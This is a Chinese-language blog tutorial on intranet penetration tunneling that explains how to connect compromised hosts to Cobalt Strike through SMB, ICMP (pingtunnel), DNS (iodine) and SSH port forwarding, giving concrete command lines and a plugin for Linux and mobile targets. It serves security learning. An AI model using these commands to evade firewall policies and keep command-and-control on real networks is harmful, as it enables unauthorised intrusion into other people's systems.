当前位置:   article > 正文

【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议_ssh icmp

ssh icmp

 

前言:

介绍: 

博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。

殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。

擅长:对于技术、工具、漏洞原理、黑产打击的研究。

C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。


导读:

面向读者:对于网络安全方面的学者。 

本文知识点(读者自测): 

(1)常用的上线方法(√)

(2)上线工具的使用(√)

 让读者如虎添翼

内网博文目标状态
【内网安全-CS】Cobalt Strike启动运行&上线方法&插件学会cs的基本使用方法、以及插件已发布
【内网安全-基础】基础知识、信息收集、工具基础知识、基础常规信息收集(命令、工具等)已发布
【内网安全-防火墙】防火墙、协议、策略防护墙的基础知识、出入站策略等已发布
【内网安全-通讯&上线】通讯&上线基础知识基础知识、通讯、上线、代理已发布
【内网安全-隧道技术】SMB、ICMP、DNS隧道、SSH协议常用的上线方法、上线工具使用已发布
隧道搭建、穿透上线2023将继续更新,敬请期待——
横向移动2023将继续更新,敬请期待——
权限维持2023将继续更新,敬请期待——
靶场练习2023将继续更新,敬请期待——


目录

一、基础知识

二、隧道技术

1、简介:

2、SMB隧道

3、ICMP隧道

4、DNS隧道

5、SSH协议

6、控制上线-插件


一、基础知识

【内网安全-基础】基础知识、信息收集、工具https://blog.csdn.net/qq_53079406/article/details/128292587?spm=1001.2014.3001.5501【内网安全-防火墙】防火墙、协议、策略https://blog.csdn.net/qq_53079406/article/details/128314938?spm=1001.2014.3001.5501【内网安全-通讯&上线】通讯&上线基础知识https://blog.csdn.net/qq_53079406/article/details/128320574?spm=1001.2014.3001.5501

二、隧道技术

1、简介:

1)是路由器把一种网络层协议封装到另一个协议中以跨过网络传送到另一个路由器的处理过程

————

2)隧道技术是一种数据包封装技术,它是将原始IP包(其报头包含原始发送者和最终目的地)封装在另一个数据包(称为封装的IP包)的数据净荷中进行传输

————

3)隧道技术上线:
HTTP/S & DNS & SSH & ICMP & SMB & 协议穿透等
除去SMB隧道外,其他隧道技术大部分针对的出站策略绕过(也就是最终传输的地方会转会原本的协议)


2、SMB隧道

1)SMB(全称是Server Message Block)是一个网络协议名,它能被用于Web连接和客户端与服务器之间的信息沟通

#判断:445端口

————

2)上线条件

1、目标主机(SMB Beacon)接受 445 端口连接(因此445端口成为判断能否使用的方法)
2、Beacon只能链接由同一个 CS生成的
3、具有管理员权限或管理员凭据

————

3)使用(工具cs)

1、创建SMB Beacon 监听器、生成木马

(用Windows可执行程序E,这里我试了试没用过的选项,stageless意为没有舞台)


2、派生会话SMB Beacon(右键选中HTTP监听器上线的主机,进入Beacon控制台,输入spawn加SMB Beacon的监听器名称)

(预计process为rundll32.exe的主机会派生会话)

 (结果:新产生一个process为beacon.exe的派生会话)


3、注入进程上线SMB Beacon(将SMB Beacon注入到某个进程中;右键--目标--进程列表--Inject--选中Beacon)

(预计最后SMB Beacon,process会变为phpstudy的进程 )

开了phpstudy做测试

 (结果新产生了一个process为beacon.exe的)


3、ICMP隧道

1)ICMP隧道技术是一种数据包封装技术,它是将原始IP包封装在ICMP的数据净荷中进行传输(传到接收方的时候,再变回Tcp)

#判断:ping命令(ping命令waf、防火墙不屏蔽情况下可以穿透)

————

2)在ICMP通信协议中,通信双方不需要开放端口( ping 命令)

————

3)ICMP协议项目:
https://github.com/esrrhs/spp
https://github.com/bdamele/icmpsh
https://github.com/esrrhs/pingtunnel

————
4)使用:

VPS:
./pingtunnel -type server

(出现问题: ./ping 隧道: 拒绝许可)
肉鸡:
管理器运行(ICMP程序)
pingtunnel.exe -type client -l 127.0.0.1:6666 -s 192.168.46.66 -t 192.168.46.66:7777 -tcp 1 -noprint 1 -nolog 1(此处,监听本地6666端口,并转发到指定ip的7777端口)
 ——
CS:
监听器1:127.0.0.1 6666
监听器2:192.168.46.66 7777
生成监听器1的Stager后门肉鸡执行


4、DNS隧道

1)DNS:为了访问互联网和内网资源,DNS提供域名解析服务,将域名和IP地址进行转换

————

2)DNS隧道是将其他协议的内容封装在DNS协议中,然后以DNS请求和响应包完成传输数据(通信)的技术。当前网络世界中的DNS是一项必不可少的服务,所以防火墙和入侵检测设备将很难做到完全过滤掉DNS流量
#判断:nslookup dig

————

#工具:https://github.com/yarrick/iodine

iodine原理:通过TAP虚拟网卡,在服务端建立起一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网。在客户端和服务端之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡

————

3)上线条件:

1、内网主机出网DNS协议数据
2、域名申请及配置
3、监听器创建及配置
4、后门绑定监听器及生成

————

4)上线:
1、内网主机出网DNS协议数据(解决通讯)
工具:https://github.com/yarrick/iodine
判断出网:nslookup www.baidu.com

——

2、服务器:设置密码并创建虚拟IP及绑定域名指向
iodined -f -c -P 密码 192.168.0.1 ns1.域名 -DD
设置密码并创建虚拟IP及绑定域名指向

——

3、客户端:连接密码并绑定域名指向
iodine -f -M 200 -P 密码 ns1.域名
-尝试通讯尝试连接:
ssh root@192.168.0.2


5、SSH协议

1)安全外壳协议(Secure Shell,简称SSH)是一种在不安全网络上用于安全远程登录和其他安全网络服务的协议

————

2)CS无SSH协议监听器配置,无法上线

————

3)通讯(SSH协议存在于Linux系统,跳板机必须Linux):

  1. iptables -F /* 清除所有规则 */
  2. iptables -A INPUT -p tcp --dport 22 -j ACCEPT /*允许包从22端口进入*/
  3. iptables -A OUTPUT -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT /*允许从22端口进入的包返回*/
  4. iptables -A OUTPUT -p udp --dport 53 -j ACCEPT /* 域名解析端口,一般不开 */
  5. iptables -A INPUT -p udp --sport 53 -j ACCEPT /* 域名解析端口,一般不开 */
  6. iptables -A INPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT /*允许本机访问本机*/
  7. iptables -A OUTPUT -s 127.0.0.1 -d 127.0.0.1 -j ACCEPT
  8. iptables -A INPUT -p tcp -s 0/0 --dport 80 -j ACCEPT /*允许所有IP访问80端口*/
  9. iptables -A OUTPUT -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
  10. iptables-save > /etc/sysconfig/iptables /*保存配置*/
  11. iptables -L /* 显示iptables列表 */
  12. 开启ssh协议登录:
  13. vi /etc/ssh/sshd_config
  14. PermitRootLogin yes
  15. PasswordAuthentication yes
  16. /etc/init.d/ssh start
  17. /etc/init.d/ssh restart
  18. 本地:出站封
  19. ssh -CfNg -L 1122:192.168.1.15:8080 root@192.168.1.166
  20. curl http://127.0.0.1:1122
  21. 远程:入站封
  22. ssh -CfNg -R 1234:192.168.1.15:8080 root@IP地址
  23. curl http://127.0.0.1:1234


6、控制上线-插件

https://github.com/gloxec/CrossC2

面向Linux Mac IOS Android系统上线支持

————

目前版本只支持反向的https和正向的tcp
1、下载对应版本加载器和CNA插件
2、上传加载器文件和本地加载CNA插件
3、修改CNA插件配置路径及上传Key文件
4、使用命令或插件绑定HTTPS监听器生成



网络安全三年之约

First year 

掌握各种原理、不断打新的靶场

目标:edusrc、cnvd 

主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/


second year 

不断学习、提升技术运用技巧,研究各种新平台

开始建立自己的渗透体系

目标:众测平台、企业src应急响应中心 

互联网大厂URL
阿里https://asrc.alibaba.com/#/
腾讯https://security.tencent.com/
百度https://bsrc.baidu.com/v2/#/home
美团https://security.meituan.com/#/home
360https://security.360.cn/
网易https://aq.163.com/
字节跳动https://security.bytedance.com/
京东https://security.jd.com/#/
新浪http://sec.sina.com.cn/
微博https://wsrc.weibo.com/
搜狗http://sec.sogou.com/
金山办公https://security.wps.cn/
有赞https://src.youzan.com/


Third Year 

学习最新的知识,建全自己的渗透体系

目标:参与护网(每一个男孩子心中的梦想) 

时间:一般5月面试,6/7月开始(持续2-3周)

分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)

本文内容由网友自发贡献,转载请注明出处:https://www.wpsshop.cn/w/笔触狂放9/article/detail/456622
推荐阅读
相关标签
  

闽ICP备14008679号